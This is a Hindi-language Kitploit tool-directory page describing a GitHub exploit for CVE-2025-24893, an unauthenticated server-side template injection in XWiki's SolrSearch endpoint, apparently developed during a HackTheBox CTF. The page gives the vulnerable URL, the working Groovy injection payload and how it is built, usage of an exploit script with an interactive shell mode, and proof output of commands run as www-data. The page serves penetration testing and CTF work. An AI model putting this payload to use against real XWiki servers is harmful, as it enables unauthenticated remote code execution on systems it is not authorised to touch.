Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/rippsec/cve-2025-24893-xwiki-ssti-rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंग
GitHubrippsec/cve-2025-24893-xwiki-ssti-rce

CVE-2025-24893-XWiki-SSTI-RCE

CVE-2025-24893 – XWiki SSTI अनप्रमाणित RCE शोषण (HackTheBox CTF)

रिपॉजिटरी देखें
535 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-24893 — XWiki SSTI दूरस्थ कोड निष्पादन

अवलोकन

क्षेत्रविवरण
CVECVE-2025-24893
सॉफ़्टवेयरXWiki
कमज़ोरीसर्वर-साइड टेम्पलेट इंजेक्शन (SSTI) → RCE
प्रमाणीकरणआवश्यक नहीं
CVSS स्कोरगंभीर
संदर्भHackTheBox CTF के दौरान खोजा गया

विवरण

XWiki एक SolrSearch एंडपॉइंट (/xwiki/bin/get/Main/SolrSearch) को उजागर करता है जो बिना स्वच्छता के Groovy टेम्पलेट इंजन के माध्यम से उपयोगकर्ता-आपूर्ति किए गए इनपुट को प्रस्तुत करता है। एक अप्रमाणित हमलावर text क्वेरी पैरामीटर के माध्यम से एक Groovy अभिव्यक्ति इंजेक्ट कर सकता है, जो अंतर्निहित सर्वर पर दूरस्थ कोड निष्पादन प्राप्त करता है।

तकनीकी विवरण

कमज़ोर एंडपॉइंट

GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=<PAYLOAD>

इंजेक्शन तंत्र

text पैरामीटर को सीधे XWiki मैक्रो संदर्भ में एम्बेड किया जाता है और Groovy इंजन द्वारा मूल्यांकन किया जाता है। इंजेक्शन }}} का उपयोग करके टेम्पलेट संदर्भ से बच जाता है और एक {{async}}{{groovy}} ब्लॉक खोलता है:

}}}{{async async=false}}{{groovy}}println("<CMD>".execute().text){{/groovy}}{{/async}}

आउटपुट RSS प्रतिक्रिया बॉडी में परिलक्षित होता है और regex के माध्यम से निकाला जा सकता है।

पेलोड संरचना

payload = '}}}{{async async=false}}{{groovy}}println("' + command + '".execute().text){{/groovy}}{{/async}}'

प्रतिक्रिया XML/RSS है — कमांड आउटपुट [}}} और ]</ मार्करों के बीच HTML-एनकोडेड वर्णों के साथ दिखाई देता है।

उपयोग

python3 exploit.py -t <TARGET> [-p PORT] [-s] [-i | -c COMMAND]
फ़्लैगविवरण
-tलक्ष्य होस्टनाम या IP
-pपोर्ट (डिफ़ॉल्ट: 80)
-sHTTPS का उपयोग करें
-iइंटरैक्टिव शेल मोड
-cएकल कमांड निष्पादन
-vवर्बोज़ आउटपुट

उदाहरण

# Single command
python3 exploit.py -t wiki.target.htb -c "id"

# Interactive shell
python3 exploit.py -t wiki.target.htb -i

# HTTPS on custom port
python3 exploit.py -t wiki.target.htb -p 443 -s -i

निर्भरताएँ

pip install requests termcolor

प्रमाण अवधारणा का

$ python3 exploit.py -t wiki.editor.htb -c "id"
[*] Executing command: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

संदर्भ

  • XWiki आधिकारिक सलाह
  • NVD प्रविष्टि
टूल डाउनलोड करें